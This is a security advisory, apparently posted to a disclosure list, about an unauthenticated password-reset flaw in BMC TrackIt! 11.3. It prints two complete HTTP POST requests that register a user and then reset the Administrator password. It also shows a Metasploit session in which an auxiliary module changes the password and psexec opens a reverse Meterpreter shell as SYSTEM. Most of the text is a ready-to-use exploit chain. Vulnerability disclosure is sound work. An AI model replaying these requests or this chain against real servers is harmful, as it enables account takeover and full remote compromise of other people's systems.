BMC TrackIt! 11.3 Unauthenticated Local User Password Change
Trial available here: http://www.trackit.com

A Metasploit pull request has been made here:
https://github.com/rapid7/metasploit-framework/pull/4359

BMC TrackIt! 11.3 when installed with TrackItWeb! allows an unauthenticated
user to change any local user's password, such as Administrator. If the
ability to log in remotely via SMB is enabled on the server, this can yield
an unauthenticated user a shell of SYSTEM using the psexec module in
Metasploit. This was tested against Windows Server 2008 R2 in a relatively
default (trackit installs SQL server) installation. A domain was set up and
the web server was added to the domain. Domain credentials were not able to
be set, only local users.

Using the Registration link in the top right of the
/PasswordReset/Application/Main page, the UI requires the user's password
to continue. However, the request made after to actually register the local
user is disparate from the authentication request and can be sent
independently. This allows an unauthenticated user to now reset that user's
password. Because the Password Reset form makes a separate distinct request
to check the answers to the secret question, the request to actually change
a user's password can be made as any user.

The first request looks like:

POST /PasswordReset/Application/Register HTTP/1.1
Host: 192.168.1.57
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:26.0)
Gecko/20100101 Firefox/26.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.57/PasswordReset
Content-Length: 318
Cookie: ASP.NET_SessionId=oyxdhg2obxlcxv30p2z0heot
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

domainname=WIN-P3AET0NFP1N&userName=Administrator&emailaddress=fdjhsahjfd%
40fdsafdsa.com
&userQuestions=[{"Id":1,"Answer":"not"},{"Id":2,"Answer":"not"}]&updatequesChk=false&SelectedQuestion=1&SelectedQuestion=2&answer=not&answer=not&confirmanswer=not&confirmanswer=not

A valid ASP.NET_SessionId is required in that a GET to the /PasswordReset/
and using the subsequent Set-Cookie in all subsequent requests as the
cookie. The domainname parameter can the the name of the computer, which is
the default value on the registration page. The userName parameter is the
user to register with the application. You can attempt this is with a user
already registered with no issue (though probably changing the secret
answers to known values is probably bad too).

The second request looks like this:

POST /PasswordReset/Application/ResetPassword HTTP/1.1
Host: 192.168.1.57
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:26.0)
Gecko/20100101 Firefox/26.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.57/PasswordReset/Application/Main
Content-Length: 92
Cookie: ASP.NET_SessionId=oyxdhg2obxlcxv30p2z0heot; UserName=Administrator
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

newPassword=n0tpassw0rd!&domain=WIN-P3AET0NFP1N&UserName=Administrator&CkbResetpassword=true

The domain and UserName parameters should match those supplied in the
previous registration request. The newPassword parameter will need to meet
any local standard enforced by GPO.

Combining these two requests will allow an unauthorised user to register a
local user to be elegible for a password reset via the password reset form,
then take advantage of the subsequent password reset vulnerability to
change the password of any local user, including Administrator.

Supplied is a metasploit auxiliary module which will change the password of
the Administrator user by default, then print the domain, username, and
password to user with psexec in order to log in over SMB.

The below Metasploit run details changing the password with the attached
module. Setting the password to the one reported by the auxiliary module,
psexec is run again and a shell as NT USER/SYSTEM is gained.


msf auxiliary(bmc_trackit_pwd_reset) > show options

Module options (auxiliary/gather/bmc_trackit_pwd_reset):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   DOMAIN                      no        The domain of the user. By default
the local user's computer name will be autodetected
   LOCALUSER  Administrator    yes       The local user to change password
for
   Proxies                     no        Use a proxy chain
   RHOST      192.168.1.57     yes       The target address
   RPORT      80               yes       The target port
   TARGETURI  /                yes       The path to BMC TrackIt
   VHOST                       no        HTTP server virtual host

msf auxiliary(bmc_trackit_pwd_reset) > run

[*] Please run the psexec module using:
[*] WIN-P3AET0NFP1N\Administrator:qGSvnJeuNO!1
[*] Auxiliary module execution completed
msf auxiliary(bmc_trackit_pwd_reset) > use exploit/windows/smb/psexec

msf exploit(psexec) >
msf exploit(psexec) > set SMBPass qGSvnJeuNO!1
SMBPass => qGSvnJeuNO!1
msf exploit(psexec) > exploit

[*] Started reverse handler on 192.168.1.31:4444
[*] Connecting to the server...
[*] Authenticating to 192.168.1.57:445|WORKGROUP as user 'Administrator'...
[*] Uploading payload...
[*] Created \fNRBQEMV.exe...
[*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.1.57[\svcctl]
...
[*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.1.57[\svcctl]
...
[*] Obtaining a service manager handle...
[*] Creating a new service (NOAlMwJR - "MBvX")...
[*] Closing service handle...
[*] Opening service...
[*] Starting the service...
[*] Removing the service...
[*] Closing service handle...
[*] Deleting \fNRBQEMV.exe...
[*] Sending stage (769024 bytes) to 192.168.1.57
[*] Meterpreter session 4 opened (192.168.1.31:4444 -> 192.168.1.57:50668)
at 2014-10-12 00:44:12 -0500

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >

-- 
http://volatile-minds.blogspot.com -- blog
http://www.volatileminds.net -- website